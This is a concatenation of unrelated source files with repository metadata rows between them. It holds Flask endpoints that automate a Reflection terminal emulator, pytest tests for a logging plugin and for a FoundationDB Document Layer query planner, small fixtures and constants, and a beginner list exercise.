    text = request.args.get('text')
    # Fixed: the original called int() on the raw query args first, so a
    # missing parameter raised TypeError before the None-check ran — the
    # 24x80 defaulting below was dead code and the handler returned HTTP 500.
    total_row_count = request.args.get('total_row_count')
    total_column_count = request.args.get('total_column_count')
    if total_row_count is None or total_column_count is None:
        total_row_count = 24
        total_column_count = 80
    else:
        total_row_count = int(total_row_count)
        total_column_count = int(total_column_count)
    for row_no in range(1, total_row_count + 1):
        line = reflection_obj.GetText(row_no, 1, total_column_count)
        if line.find(text) != -1:
            return jsonify({
                'error': False,
                'response': {'x': row_no, 'y': line.find(text) + 1}
            })
    return jsonify({
        'error': False,
        'response': {'x': 0, 'y': 0}
    })
@app.route('/check_text_present', methods=['GET', 'POST'])
def check_text_present():
    """Report whether `text` appears anywhere on the visible screen.

    Query params mirror /get_text_coordinates; response is a plain boolean.
    """
    view_idx = request.args.get('view_idx')
    view_idx = 1 if view_idx is None else int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
    text = request.args.get('text')
    # BUG FIX: the original converted with int() before the None check, so a
    # missing count parameter raised TypeError and the 24x80 default never ran.
    total_row_count = request.args.get('total_row_count')
    total_column_count = request.args.get('total_column_count')
    if total_row_count is None or total_column_count is None:
        total_row_count = 24
        total_column_count = 80
    else:
        total_row_count = int(total_row_count)
        total_column_count = int(total_column_count)
    for row_no in range(1, total_row_count + 1):
        line = reflection_obj.GetText(row_no, 1, total_column_count)
        if line.find(text) != -1:
            return jsonify({
                'error': False,
                'response': True
            })
    return jsonify({
        'error': False,
        'response': False
    })
@app.route('/move_cursor', methods=['GET', 'POST'])
def move_cursor():
    """Move the terminal cursor of a Reflection view to screen position (x, y).

    Query params: view_idx (optional, defaults to 1), x, y (numeric).
    """
    view_idx = request.args.get('view_idx')
    view_idx = 1 if view_idx is None else int(view_idx)
    reflection_obj = connect_refection(view_idx=view_idx)
    if reflection_obj is None:
        return jsonify({
            'response': 'Unexpected error occured; Please check if refection desktop is open.',
            'error': True
        })
    try:
        x = int(request.args.get('x'))
        y = int(request.args.get('y'))
    except (TypeError, ValueError):
        # int(None) -> TypeError when a parameter is missing;
        # int('abc') -> ValueError when it is not numeric.
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate.
        return jsonify({
            'response': 'Unexpected error occured; Values of x and y should be numeric.',
            'error': True
        })
    try:
        # Return value was never used by the original, so it is not captured.
        reflection_obj.MoveCursorTo1(x, y)
    except Exception:
        # The COM call can fail if the Reflection session has gone away.
        print('Unexpected error occured!, Please reconnect to the reflection tool and try again.')
        return jsonify({
            'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
            'error': True
        })
    return jsonify({
        'response': 'Cursor moved successfully.',
        'error': False
    })
@app.route('/get_view_count', methods=['GET', 'POST'])
def get_view_count():
    """Return the number of views open in the Reflection workspace frame."""
    try:
        # NOTE(review): `wc` is presumably the COM client imported at module
        # level (outside this view) — confirm; only GetObject is used here.
        wgs = wc.GetObject('Reflection Workspace')
        output = wgs.GetObject('Frame').viewCount
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt propagate.
        print('Unexpected error occured!, Please check if reflection desktop is open.')
        return jsonify({
            'response': 'Unexpected error occured; Please reconnect to the reflection tool and try again.',
            'error': True
        })
    return jsonify({
        'response': output,
        'error': False
    })
| 33.265625
| 111
| 0.585815
| 1,244
| 10,645
| 4.865756
| 0.095659
| 0.076326
| 0.098133
| 0.106394
| 0.843714
| 0.816455
| 0.787543
| 0.779779
| 0.771683
| 0.771683
| 0
| 0.005272
| 0.30512
| 10,645
| 319
| 112
| 33.369906
| 0.813032
| 0
| 0
| 0.814815
| 0
| 0
| 0.288586
| 0.001973
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0.016835
| 0
| 0.161616
| 0.03367
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b80f40c3a1a896b776c3a385b528082d5d91b3a
| 2,994
|
py
|
Python
|
tests/test_hooks.py
|
j19sch/pytest-logfest
|
02fefdd8b9b1d1663a473300e51e9045d1a2b811
|
[
"MIT"
] | null | null | null |
tests/test_hooks.py
|
j19sch/pytest-logfest
|
02fefdd8b9b1d1663a473300e51e9045d1a2b811
|
[
"MIT"
] | null | null | null |
tests/test_hooks.py
|
j19sch/pytest-logfest
|
02fefdd8b9b1d1663a473300e51e9045d1a2b811
|
[
"MIT"
] | 1
|
2021-08-18T17:59:56.000Z
|
2021-08-18T17:59:56.000Z
|
import os
from . import helpers
def test_basic_logging_filename_hook(testdir):
    """The basic-mode filename hook can append a component to the session log name."""
    testdir.makeconftest("""
import pytest

@pytest.mark.optionalhook
def pytest_logfest_log_file_name_basic(filename_components):
    filename_components.append("fizzbuzz")
""")
    testdir.makepyfile("""
import pytest

def test_pass(function_logger):
    pass
""")
    result = testdir.runpytest('--logfest=basic', '--log-level=debug')
    assert result.ret == 0

    artifacts_dir = str(testdir.tmpdir.join('artifacts'))
    # isdir already returns a bool, so the `is True` comparison was redundant.
    assert os.path.isdir(artifacts_dir)

    log_files = helpers.get_logfiles_in_testdir(artifacts_dir)
    assert len(log_files) == 1

    timestamp = helpers.get_timestamp_from_logfile_name(log_files[0])
    basic_logfile = "session-%s-fizzbuzz.log" % timestamp
    helpers.assert_filename_in_list_of_files(basic_logfile, log_files)
def test_full_logging_filename_hook_module(testdir):
    """The full-mode module filename hook can append a component to the module log name."""
    testdir.makeconftest("""
import pytest

@pytest.mark.optionalhook
def pytest_logfest_log_file_name_full_module(filename_components):
    filename_components.append("fizzbuzz")
""")
    testdir.makepyfile("""
import pytest

def test_pass(function_logger):
    pass
""")
    result = testdir.runpytest('--logfest=full', '--log-level=debug')
    assert result.ret == 0

    artifacts_dir = str(testdir.tmpdir.join('artifacts'))
    # artifacts_dir is already a str; the original wrapped it in str() again.
    # isdir already returns a bool, so the `is True` comparison was redundant.
    assert os.path.isdir(artifacts_dir)

    log_files = helpers.get_logfiles_in_testdir(artifacts_dir)
    assert len(log_files) == 2

    timestamp = helpers.get_timestamp_from_logfile_name(log_files[0])
    full_logfile = "test_full_logging_filename_hook_module-%s-fizzbuzz.log" % timestamp
    helpers.assert_filename_in_list_of_files(full_logfile, log_files)
def test_full_logging_filename_hook_session(testdir):
    """The full-mode session filename hook can append a component to the session log name."""
    testdir.makeconftest("""
import pytest

@pytest.fixture(scope='session', autouse='true')
def session_log(session_logger):
    session_logger.info("Session info log line")

@pytest.mark.optionalhook
def pytest_logfest_log_file_name_full_session(filename_components):
    filename_components.append("fizzbuzz")
""")
    testdir.makepyfile("""
import pytest

def test_pass(function_logger):
    pass
""")
    result = testdir.runpytest('--logfest=full', '--log-level=debug')
    assert result.ret == 0

    artifacts_dir = str(testdir.tmpdir.join('artifacts'))
    # artifacts_dir is already a str; the original wrapped it in str() again.
    # isdir already returns a bool, so the `is True` comparison was redundant.
    assert os.path.isdir(artifacts_dir)

    log_files = helpers.get_logfiles_in_testdir(artifacts_dir)
    assert len(log_files) == 3

    timestamp = helpers.get_timestamp_from_logfile_name(log_files[0])
    full_logfile_session = "test_full_logging_filename_hook_session0-%s-fizzbuzz.log" % timestamp
    helpers.assert_filename_in_list_of_files(full_logfile_session, log_files)
| 26.972973
| 97
| 0.693387
| 359
| 2,994
| 5.445682
| 0.178273
| 0.049105
| 0.048593
| 0.047059
| 0.880307
| 0.866496
| 0.824041
| 0.824041
| 0.824041
| 0.781586
| 0
| 0.004203
| 0.205411
| 2,994
| 110
| 98
| 27.218182
| 0.81757
| 0
| 0
| 0.662162
| 0
| 0
| 0.408818
| 0.224449
| 0
| 0
| 0
| 0
| 0.162162
| 1
| 0.040541
| false
| 0.081081
| 0.108108
| 0
| 0.148649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1ba9872c2e23d16a2b0e86820e726922c652b5cc
| 105
|
py
|
Python
|
app/main/__init__.py
|
cassjs/pyrate-stocks
|
223e8246fc7eadb93f17234f639208759515d638
|
[
"MIT"
] | 4
|
2021-03-26T16:33:06.000Z
|
2021-09-21T17:26:34.000Z
|
app/main/__init__.py
|
cassjs/pyrate-stocks
|
223e8246fc7eadb93f17234f639208759515d638
|
[
"MIT"
] | 5
|
2021-03-20T00:34:29.000Z
|
2021-03-22T23:36:23.000Z
|
app/main/__init__.py
|
cassjs/pyrate-stocks
|
223e8246fc7eadb93f17234f639208759515d638
|
[
"MIT"
] | 3
|
2021-03-24T00:03:05.000Z
|
2021-05-21T08:04:36.000Z
|
from flask import Blueprint

# Blueprint for the "main" section of the app; registered by the app factory.
main_bp = Blueprint('main_bp', __name__)

# Imported *after* the blueprint exists so that views/errors can attach their
# routes to main_bp without triggering a circular import.
from app.main import views, errors
| 21
| 40
| 0.790476
| 16
| 105
| 4.8125
| 0.625
| 0.337662
| 0.38961
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.133333
| 105
| 5
| 41
| 21
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.066038
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
9463a9213c210aa68c3bf333188d2fcf6ed1909d
| 14,135
|
py
|
Python
|
test/correctness/smoke/test_planner.py
|
kolesa-team/fdb-document-layer
|
d556bbf1a8f7cd3fd382943eb1694599b0bf15b3
|
[
"Apache-2.0"
] | 176
|
2018-11-29T19:49:24.000Z
|
2022-03-13T07:20:12.000Z
|
test/correctness/smoke/test_planner.py
|
kolesa-team/fdb-document-layer
|
d556bbf1a8f7cd3fd382943eb1694599b0bf15b3
|
[
"Apache-2.0"
] | 145
|
2018-11-29T21:56:37.000Z
|
2021-11-29T06:31:55.000Z
|
test/correctness/smoke/test_planner.py
|
kolesa-team/fdb-document-layer
|
d556bbf1a8f7cd3fd382943eb1694599b0bf15b3
|
[
"Apache-2.0"
] | 29
|
2018-11-29T19:37:56.000Z
|
2021-11-06T14:20:28.000Z
|
#
# test_planner.py
#
# This source file is part of the FoundationDB open source project
#
# Copyright 2013-2019 Apple Inc. and the FoundationDB project authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Predicates(object):
    """Predicates over the 'explanation' tree returned by find().explain().

    Plan trees nest in two ways: a 'union' node holds child plans in
    'plans', and wrapper nodes reference their single child via 'source_plan'.
    Each predicate recurses through both shapes.
    """

    @staticmethod
    def no_table_scan(explanation):
        """Return True when no node anywhere in the plan is a table scan."""
        this_type = explanation['type']
        if this_type == 'table scan':
            return False
        if this_type == 'union':
            # Generator expression instead of a throwaway list (C419).
            return all(Predicates.no_table_scan(p) for p in explanation['plans'])
        if 'source_plan' in explanation:
            return Predicates.no_table_scan(explanation['source_plan'])
        return True

    @staticmethod
    def only_index_named(index_name, explanation):
        """Return True when every leaf scan uses exactly the index `index_name`."""
        this_type = explanation['type']
        if this_type == 'index scan' and explanation['index name'] == index_name:
            return True
        if this_type == 'union':
            return all(Predicates.only_index_named(index_name, p) for p in explanation['plans'])
        if 'source_plan' in explanation:
            return Predicates.only_index_named(index_name, explanation['source_plan'])
        return False

    @staticmethod
    def pk_lookup(explanation):
        """Return True when every leaf of the plan is a primary-key lookup."""
        this_type = explanation['type']
        if this_type == 'PK lookup':
            return True
        if this_type == 'union':
            return all(Predicates.pk_lookup(p) for p in explanation['plans'])
        if 'source_plan' in explanation:
            return Predicates.pk_lookup(explanation['source_plan'])
        return False

    @staticmethod
    def no_filter(explanation):
        """Return True when no node in the plan is a post-hoc filter."""
        this_type = explanation['type']
        if this_type == 'filter':
            return False
        if this_type == 'union':
            return all(Predicates.no_filter(p) for p in explanation['plans'])
        if 'source_plan' in explanation:
            return Predicates.no_filter(explanation['source_plan'])
        return True

    @staticmethod
    def pk_lookup_no_filter(explanation):
        """PK lookups everywhere and no filter node."""
        return Predicates.pk_lookup(explanation) and Predicates.no_filter(explanation)

    @staticmethod
    def no_table_scan_no_filter(explanation):
        """No table scan anywhere and no filter node."""
        return Predicates.no_table_scan(explanation) and Predicates.no_filter(explanation)
# PK Lookup Tests
def test_pk_lookup(fixture_collection):
    """An equality query on _id becomes a filter-free PK lookup."""
    plan = fixture_collection.find({'_id': 1}).explain()['explanation']
    assert Predicates.pk_lookup_no_filter(plan)
def test_pk_scan(fixture_collection):
    """A range query on _id is still served from the primary key."""
    plan = fixture_collection.find({'_id': {'$gt': 1}}).explain()['explanation']
    assert Predicates.pk_lookup(plan)
# Simple Index Tests
def test_simple_index_basic(fixture_collection):
    """An equality query on an indexed field needs no table scan and no filter."""
    fixture_collection.create_index(keys=[('a', 1)], name='index')
    plan = fixture_collection.find({'a': 1}).explain()['explanation']
    assert Predicates.no_table_scan_no_filter(plan)
def test_simple_index_union(fixture_collection):
    """$or over two indexed fields is planned as a union of index scans."""
    fixture_collection.create_index(keys=[('a', 1)], name='index1')
    fixture_collection.create_index(keys=[('b', 1)], name='index2')
    plan = fixture_collection.find({'$or': [{'a': 1}, {'b': 1}]}).explain()['explanation']
    assert Predicates.no_table_scan(plan)
def test_simple_index_compound_as_simple(fixture_collection):
    """A compound index can serve an equality query on its first field alone."""
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
    plan = fixture_collection.find({'a': 1}).explain()['explanation']
    assert Predicates.no_table_scan_no_filter(plan)
def test_simple_index_prefer_simple_over_compound(fixture_collection):
    """Given both a compound and a simple index on 'a', the simple one is chosen."""
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
    fixture_collection.create_index(keys=[('a', 1)], name='simple')
    plan = fixture_collection.find({'a': 1}).explain()['explanation']
    assert Predicates.only_index_named('simple', plan)
def test_simple_index_prefer_shorter_compound_index(fixture_collection):
    """Of two compound indexes with the same prefix, the shorter one is chosen."""
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='long')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='short')
    plan = fixture_collection.find({'a': 1}).explain()['explanation']
    assert Predicates.only_index_named('short', plan)
def test_simple_index_greedy_plan(fixture_collection):
    """The greedy planner picks the index matching the first $and conjunct."""
    fixture_collection.create_index(keys=[('a', 1)], name='one')
    fixture_collection.create_index(keys=[('b', 1)], name='two')
    plan = fixture_collection.find({'$and': [{'b': 1}, {'a': 1}]}).explain()['explanation']
    assert Predicates.only_index_named('two', plan)
def test_simple_index_scan(fixture_collection):
    """A range predicate on an indexed field is served by an index scan."""
    fixture_collection.create_index(keys=[('a', 1)], name='index')
    plan = fixture_collection.find({'a': {'$gt': 1}}).explain()['explanation']
    assert Predicates.no_table_scan(plan)
def test_simple_index_multi_union(fixture_collection):
    """A four-branch $or mixing equality and range predicates avoids table scans."""
    fixture_collection.create_index(keys=[('d', 1)], name='index1')
    fixture_collection.create_index(keys=[('c', 1)], name='index2')
    fixture_collection.create_index(keys=[('b', 1)], name='index3')
    fixture_collection.create_index(keys=[('a', 1)], name='index4')
    query = {'$or': [{'a': {'$gt': 1}}, {'b': 1}, {'c': {'$lte': 1}}, {'d': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.no_table_scan(plan)
def test_simple_index_dotted_path(fixture_collection):
    """An index on a dotted (nested) path is usable for equality queries."""
    fixture_collection.create_index(keys=[('a.b', 1)], name='simple')
    plan = fixture_collection.find({'a.b': 'hello'}).explain()['explanation']
    assert Predicates.no_table_scan(plan)
# Compound Index Tests
def test_compound_index_basic(fixture_collection):
    """An $and covering all compound-index fields needs no table scan or filter."""
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
    plan = fixture_collection.find({'$and': [{'a': 1}, {'b': 1}]}).explain()['explanation']
    assert Predicates.no_table_scan_no_filter(plan)
def test_compound_index_out_of_order(fixture_collection):
    """Conjunct order in the query does not prevent compound-index use."""
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
    plan = fixture_collection.find({'$and': [{'b': 1}, {'a': 1}]}).explain()['explanation']
    assert Predicates.no_table_scan(plan)
def test_compound_index_find_long_index(fixture_collection):
    """A seven-field compound index is matched even with reversed conjunct order."""
    fixture_collection.create_index(
        keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1), ('f', 1), ('g', 1)],
        name='long')
    query = {'$and': [{'g': 1}, {'f': 1}, {'e': 1}, {'d': 1}, {'c': 1}, {'b': 1}, {'a': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.no_table_scan(plan)
def test_compound_index_union(fixture_collection):
    """An $or of two $and branches uses one compound index per branch."""
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='compound')
    fixture_collection.create_index(keys=[('d', 1), ('c', 1)], name='compound2')
    query = {'$or': [{'$and': [{'b': 1}, {'a': 1}]},
                     {'$and': [{'d': 1}, {'c': 1}]}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.no_table_scan(plan)
def test_compound_index_range_at_end(fixture_collection):
    """A range on the last compound field still favors the compound index."""
    fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='compound')
    fixture_collection.create_index(keys=[('d', 1)], name='simple')
    query = {'$and': [{'c': {'$gt': 1}}, {'b': 1}, {'d': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.only_index_named("compound", plan)
def test_compound_index_range_at_start(fixture_collection):
    """A range on the leading compound field pushes the planner to the simple index."""
    fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='compound')
    fixture_collection.create_index(keys=[('d', 1)], name='simple')
    query = {'$and': [{'d': {'$gt': 1}}, {'b': 1}, {'c': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.only_index_named("simple", plan)
def test_compound_index_range_at_middle(fixture_collection):
    """A range on a middle compound field still favors the compound index."""
    fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='compound')
    fixture_collection.create_index(keys=[('d', 1)], name='simple')
    query = {'$and': [{'b': {'$gt': 1}}, {'d': 1}, {'c': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.only_index_named("compound", plan)
def test_compound_index_greedy_planner(fixture_collection):
    """The greedy planner picks the index keyed on the first conjunct's field."""
    fixture_collection.create_index(keys=[('d', 1), ('b', 1), ('c', 1)], name='long')
    fixture_collection.create_index(keys=[('b', 1), ('c', 1)], name='short')
    query = {'$and': [{'b': 1}, {'d': 1}, {'c': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.only_index_named("short", plan)
def test_compound_index_match_exact_index(fixture_collection):
    """Among several prefix-related indexes, the exact-field match is chosen."""
    fixture_collection.create_index(keys=[('a', 1)], name='a')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='ab')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='abc')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1)], name='abcde')
    query = {'$and': [{'a': 1}, {'b': 1}, {'c': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.only_index_named("abc", plan) and Predicates.no_table_scan_no_filter(plan)
def test_compound_index_match_longest_prefix(fixture_collection):
    """With no exact match, the index covering the longest query prefix wins."""
    fixture_collection.create_index(keys=[('a', 1)], name='a')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='ab')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='abc')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1)], name='abcde')
    query = {'$and': [{'a': 1}, {'b': 1}, {'c': 1}, {'d': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.only_index_named("abcde", plan) and Predicates.no_table_scan_no_filter(plan)
def test_compound_index_match_non_contiguous_prefix(fixture_collection):
    """A gap in the queried fields limits index use to the contiguous prefix."""
    fixture_collection.create_index(keys=[('a', 1)], name='a')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1)], name='ab')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1)], name='abc')
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1), ('e', 1)], name='abcde')
    query = {'$and': [{'a': 1}, {'b': 1}, {'c': 1}, {'e': 1}]}
    plan = fixture_collection.find(query).explain()['explanation']
    assert Predicates.only_index_named("abc", plan) and Predicates.no_table_scan(plan)
def test_compound_index_multi_match(fixture_collection):
    """With many candidate indexes, the planner matches conjunct order to index order."""
    fixture_collection.create_index(keys=[('a', 1), ('b', 1), ('c', 1), ('d', 1)], name='abcd')
    fixture_collection.create_index(keys=[('a', 1), ('e', 1)], name='ae')
    fixture_collection.create_index(keys=[('a', 1), ('d', 1)], name='ad')
    fixture_collection.create_index(keys=[('d', 1), ('a', 1)], name='da')
    fixture_collection.create_index(keys=[('e', 1)], name='e')

    # Exact two-field match: (a, d) -> 'ad', fully covered, no filter needed.
    plan = fixture_collection.find({'$and': [{'a': 1}, {'d': 1}]}).explain()['explanation']
    assert Predicates.only_index_named('ad', plan)
    assert Predicates.no_table_scan(plan)
    assert Predicates.no_filter(plan)

    # Extra conjunct on 'e' still uses 'ad' (a residual filter is allowed here).
    plan = fixture_collection.find({'$and': [{'a': 1}, {'d': 1}, {'e': 1}]}).explain()['explanation']
    assert Predicates.only_index_named('ad', plan)
    assert Predicates.no_table_scan(plan)

    # Reversed conjunct order matches the reversed index 'da'.
    plan = fixture_collection.find({'$and': [{'d': 1}, {'a': 1}]}).explain()['explanation']
    assert Predicates.only_index_named('da', plan)
    assert Predicates.no_table_scan(plan)
    assert Predicates.no_filter(plan)

    # A bare 'd' query is served by the index whose first field is 'd'.
    plan = fixture_collection.find({'d': 1}).explain()['explanation']
    assert Predicates.only_index_named('da', plan)
    assert Predicates.no_table_scan(plan)
| 32.125
| 126
| 0.580686
| 1,661
| 14,135
| 4.717038
| 0.096328
| 0.206126
| 0.135035
| 0.164391
| 0.853861
| 0.834844
| 0.791704
| 0.754818
| 0.668922
| 0.65067
| 0
| 0.016769
| 0.253272
| 14,135
| 439
| 127
| 32.198178
| 0.725533
| 0.051362
| 0
| 0.688889
| 0
| 0
| 0.083819
| 0
| 0
| 0
| 0
| 0
| 0.088889
| 1
| 0.080556
| false
| 0
| 0
| 0.005556
| 0.133333
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84763873c1802b0d6feecf59da2eae0a15a2a840
| 93
|
py
|
Python
|
tests/data/format/quotes_type/variable_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 4
|
2022-01-02T22:50:59.000Z
|
2022-02-09T09:04:37.000Z
|
tests/data/format/quotes_type/variable_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 80
|
2022-01-02T09:02:50.000Z
|
2022-03-30T13:34:10.000Z
|
tests/data/format/quotes_type/variable_docstring.py
|
DanielNoord/pydocstringformatter
|
a69302cee6bd32b9b5cc48912a47d0e8ad3f7abe
|
[
"MIT"
] | 2
|
2022-01-02T11:58:29.000Z
|
2022-01-04T18:53:29.000Z
|
MYVAR = 1
''' A multi-line
docstring
'''
MYVAR = 1
''' A multi-line
docstring
'''
| 9.3
| 19
| 0.537634
| 12
| 93
| 4.166667
| 0.5
| 0.24
| 0.28
| 0.48
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.290323
| 93
| 9
| 20
| 10.333333
| 0.727273
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
84831e9e624b1b07e7b74663ef8bc48c178fecbd
| 1,347
|
py
|
Python
|
testing/data/list_constants.py
|
lizschley/number_six
|
a427202397822fca1f49d43d138c24fffdbe95da
|
[
"MIT"
] | 1
|
2020-07-14T20:13:05.000Z
|
2020-07-14T20:13:05.000Z
|
testing/data/list_constants.py
|
lizschley/number_six
|
a427202397822fca1f49d43d138c24fffdbe95da
|
[
"MIT"
] | 3
|
2021-04-06T20:40:08.000Z
|
2021-06-03T21:54:21.000Z
|
testing/data/list_constants.py
|
lizschley/number_six
|
a427202397822fca1f49d43d138c24fffdbe95da
|
[
"MIT"
] | null | null | null |
''' This is for list data that is stored in constants and used for Testing'''
# Keys a paragraph-display context dict is expected to contain.
KEYS_FOR_PARA_DISPLAY_CONTEXT = ['title', 'title_note', 'paragraphs']
# Sample paragraph text, wrapped in <p> tags.
# NOTE(review): there is no comma after 'quoted from', so Python's implicit
# string concatenation merges it with the following '<a href=...' literal into
# ONE list element (the list has fewer elements than lines) — confirm intended.
TEXT_LIST_WITH_PARA_TAGS = [
    '<p>If the stem on your ground-trailing vine is reddish in color with',
    'red-tinted hairs and thin, fine thorns, it\'s a dewberry. Blackberries,',
    'which grow upward, have no hairs, and the thorns are hard and tough.',
    'The leaves of both are similar in appearance. If you come across a, stand',
    'of berries that ripen in April or May, they are dewberries. Directly',
    'quoted from'
    '<a href="https://homeguides.sfgate.com/blackberry-vs-dewberry-fruit-85014.html"',
    'target="_blank">SealJann_20200520_SFGate_BlackberryVsDewberry</a></p>'
]
# Same sample text without the <p> wrapper.
# NOTE(review): same missing comma after 'quoted from' as above — confirm.
TEXT_LIST_WITHOUT_PARA_TAGS = [
    'If the stem on your ground-trailing vine is reddish in color with',
    'red-tinted hairs and thin, fine thorns, it\'s a dewberry. Blackberries,',
    'which grow upward, have no hairs, and the thorns are hard and tough.',
    'The leaves of both are similar in appearance. If you come across a, stand',
    'of berries that ripen in April or May, they are dewberries. Directly',
    'quoted from'
    '<a href="https://homeguides.sfgate.com/blackberry-vs-dewberry-fruit-85014.html"',
    'target="_blank">SealJann_20200520_SFGate_BlackberryVsDewberry</a>'
]
| 51.807692
| 86
| 0.723088
| 205
| 1,347
| 4.64878
| 0.42439
| 0.033578
| 0.018888
| 0.023085
| 0.841553
| 0.841553
| 0.841553
| 0.841553
| 0.841553
| 0.841553
| 0
| 0.023214
| 0.168523
| 1,347
| 25
| 87
| 53.88
| 0.827679
| 0.051967
| 0
| 0.571429
| 0
| 0.047619
| 0.768504
| 0.105512
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca5d26fe7fc4e9a98b08ead0b6c23cd72f502199
| 413
|
py
|
Python
|
Ex6.py
|
EduarTeixeira/Exercicios_LP_3B
|
dfbbd58e1a1c2033ee4f643cc5b60a86a7213f0a
|
[
"MIT"
] | null | null | null |
Ex6.py
|
EduarTeixeira/Exercicios_LP_3B
|
dfbbd58e1a1c2033ee4f643cc5b60a86a7213f0a
|
[
"MIT"
] | null | null | null |
Ex6.py
|
EduarTeixeira/Exercicios_LP_3B
|
dfbbd58e1a1c2033ee4f643cc5b60a86a7213f0a
|
[
"MIT"
] | null | null | null |
# Read five fruit names from the user and report the position of "Morango".
PROMPT = "Digite o nome de uma fruta para adicionar na lista: "

# One comprehension replaces the five copy-pasted input() calls of the
# original (same prompt, same order, same resulting list).
lista = [input(PROMPT) for _ in range(5)]

# BUG FIX: list.index raises ValueError when the item is absent, so guard
# the lookup instead of crashing when the user never typed "Morango".
if "Morango" in lista:
    print("O morango está na posição ", lista.index("Morango"))
else:
    print("Morango não está na lista")
| 59
| 65
| 0.697337
| 75
| 413
| 3.84
| 0.28
| 0.190972
